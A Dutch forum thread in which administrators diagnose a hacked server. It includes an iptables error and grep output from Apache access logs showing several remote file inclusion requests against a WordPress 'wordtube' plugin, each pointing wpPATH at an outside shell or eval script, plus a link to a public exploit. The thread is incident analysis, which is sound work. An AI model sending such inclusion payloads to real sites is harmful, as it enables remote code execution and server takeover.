ja dank je, had ik dus in je andere topic gepost :p
typfoutje, even regel voor regel proberen uit te voeren om zo op te zoeken op welke hij stuk gaat.Citaat:
als ik de iptables aanpas dan staat er
iptables v1.3.0: invalid port/service `' specified
Try `iptables -h' or 'iptables --help' for more information.
wow, dit is die nieuwe WP sploit die ze misbruikt hebben :) lijpCitaat:
[root@centralnexus tmp]# grep 'perl' /var/www/vhosts/*/statistics/logs/access_log
/var/www/vhosts/purestas.com/statistics/logs/access_log:203.157.172.2 - - [08/May/2007:04:45:08 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shellbr.xpg.com.br/cmd.txt? HTTP/1.1" 200 11584 "-" "libwww-perl/5.79"
/var/www/vhosts/purestas.com/statistics/logs/access_log:80.6.95.5 - - [08/May/2007:06:07:24 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/cmd.gif? HTTP/1.1" 200 11584 "-" "libwww-perl/5.805"
/var/www/vhosts/purestas.com/statistics/logs/access_log:81.7.87.251 - - [08/May/2007:09:18:00 +0200] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.prancuzai-mopsai.lt/eval.txt? HTTP/1.1" 200 514 "-" "libwww-perl/5.65"
/var/www/vhosts/purestas.com/statistics/logs/access_log:84.16.242.71 - - [08/May/2007:10:46:41 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 496 "-" "libwww-perl/5.805"
/var/www/vhosts/purestas.com/statistics/logs/access_log:201.41.100.226 - - [08/May/2007:11:19:47 +0200] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://perdu.ch/cgi-bin/echo? HTTP/1.1" 200 498 "-" "libwww-perl/5.65"
/var/www/vhosts/purestas.com/statistics/logs/access_log:216.104.33.30 - - [08/May/2007:11:45:20 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/os? HTTP/1.1" 200 319 "-" "libwww-perl/5.805"
/var/www/vhosts/purestas.com/statistics/logs/access_log:85.10.128.239 - - [08/May/2007:12:18:48 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sanwall.info/echo.txt? HTTP/1.1" 200 500 "-" "libwww-perl/5.803"
[root@centralnexus tmp]#
http://www.milw0rm.com/exploits/3825
kortom, iemand op je server heeft een lekke wordpress, en doordat de tmp mappen +x hebben/hadden kon er malicious code uitgevoerd worden.

